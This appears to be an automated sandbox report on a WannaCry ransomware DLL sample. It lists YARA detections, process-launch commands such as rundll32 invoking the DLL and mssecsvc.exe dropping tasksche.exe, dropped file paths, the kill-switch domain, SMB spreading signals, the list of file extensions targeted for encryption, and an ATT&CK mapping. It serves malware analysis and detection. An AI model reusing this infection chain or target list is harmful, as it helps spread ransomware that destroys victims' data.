                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1fd30a4.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1fd30a4.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0000000A.00000000.313432129.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 0000000A.00000002.315696663.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000009.00000000.309686904.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000005.00000000.297315623.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000007.00000000.306519342.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000007.00000000.301466734.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000005.00000000.295748981.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000008.00000002.818892298.0000000001FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000007.00000000.308739689.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000005.00000000.299133974.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000007.00000002.317673463.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000005.00000000.301753612.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000008.00000000.306158904.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000008.00000002.820822570.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000007.00000000.303052057.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\tasksche.exeCode function: 9_2_00406C409_2_00406C40
                Source: C:\Windows\tasksche.exeCode function: 9_2_00402A769_2_00402A76
                Source: C:\Windows\tasksche.exeCode function: 9_2_00402E7E9_2_00402E7E
                Source: C:\Windows\tasksche.exeCode function: 9_2_0040350F9_2_0040350F
                Source: C:\Windows\tasksche.exeCode function: 9_2_00404C199_2_00404C19
                Source: C:\Windows\tasksche.exeCode function: 9_2_0040541F9_2_0040541F
                Source: C:\Windows\tasksche.exeCode function: 9_2_004037979_2_00403797
                Source: C:\Windows\tasksche.exeCode function: 9_2_004043B79_2_004043B7
                Source: C:\Windows\tasksche.exeCode function: 9_2_004031BC9_2_004031BC
                Source: mssecsvc.exe.3.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: tasksche.exe.5.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                Source: Joe Sandbox ViewDropped File: C:\WINDOWS\qeriuwjhrf (copy) 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
                Source: mbXvGlj2dR.dllReversingLabs: Detection: 91%
                Source: mbXvGlj2dR.dllVirustotal: Detection: 87%
                Source: mbXvGlj2dR.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mbXvGlj2dR.dll,PlayGame
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",PlayGame
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: unknownProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mbXvGlj2dR.dll,PlayGameJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",PlayGameJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                Source: C:\Windows\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winDLL@21/5@3/100
                Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40
                Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,8_2_00407C40
                Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,9_2_00401CE8
                Source: C:\Windows\mssecsvc.exeCode function: 5_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,5_2_00408090
                Source: C:\Windows\mssecsvc.exeCode function: 8_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,8_2_00408090
                Source: C:\Windows\mssecsvc.exeCode function: 5_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mbXvGlj2dR.dll,PlayGame
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
                Source: C:\Windows\mssecsvc.exeCode function: 5_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,5_2_00407CE0
                Source: tasksche.exe, 00000009.00000000.309686904.000000000040E000.00000008.00000001.01000000.00000006.sdmp, tasksche.exe, 0000000A.00000000.313432129.000000000040E000.00000008.00000001.01000000.00000006.sdmp, mbXvGlj2dR.dll, mssecsvc.exe.3.dr, tasksche.exe.5.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: mbXvGlj2dR.dllStatic file information: File size 5267459 > 1048576
                Source: mbXvGlj2dR.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
                Source: C:\Windows\tasksche.exeCode function: 9_2_00407710 push eax; ret 9_2_0040773E
                Source: C:\Windows\tasksche.exeCode function: 9_2_004076C8 push eax; ret 9_2_004076E6
                Source: C:\Windows\tasksche.exeCode function: 9_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00401A45

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeFile created: C:\WINDOWS\qeriuwjhrf (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeFile created: C:\WINDOWS\qeriuwjhrf (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                Source: C:\Windows\mssecsvc.exeCode function: 5_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\mssecsvc.exe TID: 4500Thread sleep count: 83 > 30Jump to behavior
                Source: C:\Windows\mssecsvc.exe TID: 4500Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\mssecsvc.exe TID: 3100Thread sleep count: 243 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5908Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\mssecsvc.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                Source: svchost.exe, 0000000E.00000002.818543170.00000202ACC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                Source: mssecsvc.exe, 00000007.00000002.318990640.0000000000D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn\
                Source: mssecsvc.exe, 00000005.00000002.316398385.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000007.00000002.318990640.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.818527394.00000202ACC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000000E.00000002.818033898.00000202A7629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`R
                Source: C:\Windows\tasksche.exeCode function: 9_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00401A45
                Source: C:\Windows\tasksche.exeCode function: 9_2_004029CC free,GetProcessHeap,HeapFree,9_2_004029CC
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1Jump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Service Execution
                4
                Windows Service
                4
                Windows Service
                12
                Masquerading
                OS Credential Dumping1
                Network Share Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium22
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts1
                Native API
                Boot or Logon Initialization Scripts11
                Process Injection
                21
                Virtualization/Sandbox Evasion
                LSASS Memory121
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Obfuscated Files or Information
                NTDS1
                Remote System Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Rundll32
                LSA Secrets21
                System Information Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Software Packing
                Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 771980 Sample: mbXvGlj2dR.dll Startdate: 22/12/2022 Architecture: WINDOWS Score: 100 60 Tries to download HTTP data from a sinkholed server 2->60 62 Snort IDS alert for network traffic 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 8 other signatures 2->66 9 loaddll32.exe 1 2->9         started        11 mssecsvc.exe 2->11         started        15 svchost.exe 1 1 2->15         started        process3 dnsIp4 17 cmd.exe 1 9->17         started        19 rundll32.exe 9->19         started        22 rundll32.exe 1 9->22         started        25 conhost.exe 9->25         started        52 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 11->52 54 91.252.232.99, 445 WINDTRE-ASIT Italy 11->54 56 99 other IPs or domains 11->56 82 Connects to many different private IPs via SMB (likely to spread or exploit) 11->82 84 Connects to many different private IPs (likely to spread or exploit) 11->84 signatures5 process6 file7 27 rundll32.exe 17->27         started        68 Drops executables to the windows directory (C:\Windows) and starts them 19->68 29 mssecsvc.exe 7 19->29         started        46 C:\Windows\mssecsvc.exe, PE32 22->46 dropped signatures8 process9 dnsIp10 34 mssecsvc.exe 7 27->34         started        58 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 29->58 48 C:\WINDOWS\qeriuwjhrf (copy), PE32 29->48 dropped 86 Drops executables to the windows directory (C:\Windows) and starts them 29->86 39 tasksche.exe 29->39         started        file11 signatures12 process13 dnsIp14 50 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 34->50 44 C:\Windows\tasksche.exe, PE32 34->44 dropped 70 Antivirus detection for dropped file 34->70 72 Multi AV Scanner detection for dropped file 34->72 74 Machine Learning detection for dropped file 34->74 41 tasksche.exe 34->41         started        file15 signatures16 process17 signatures18 76 Detected Wannacry Ransomware 41->76 78 Antivirus detection for dropped file 41->78 80 Machine Learning detection for dropped file 41->80

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                mbXvGlj2dR.dll91%ReversingLabsWin32.Ransomware.WannaCry
                mbXvGlj2dR.dll87%VirustotalBrowse
                mbXvGlj2dR.dll100%AviraTR/AD.WannaCry.zbqny
                mbXvGlj2dR.dll100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Windows\mssecsvc.exe100%AviraTR/AD.WannaCry.bqdjz
                C:\Windows\tasksche.exe100%AviraTR/AD.WannaCry.sewvt
                C:\Windows\mssecsvc.exe100%Joe Sandbox ML
                C:\Windows\tasksche.exe100%Joe Sandbox ML
                C:\WINDOWS\qeriuwjhrf (copy)98%ReversingLabsWin32.Ransomware.WannaCry
                C:\Windows\mssecsvc.exe95%ReversingLabsWin32.Ransomware.WannaCry
                SourceDetectionScannerLabelLinkDownload
                7.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.2.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
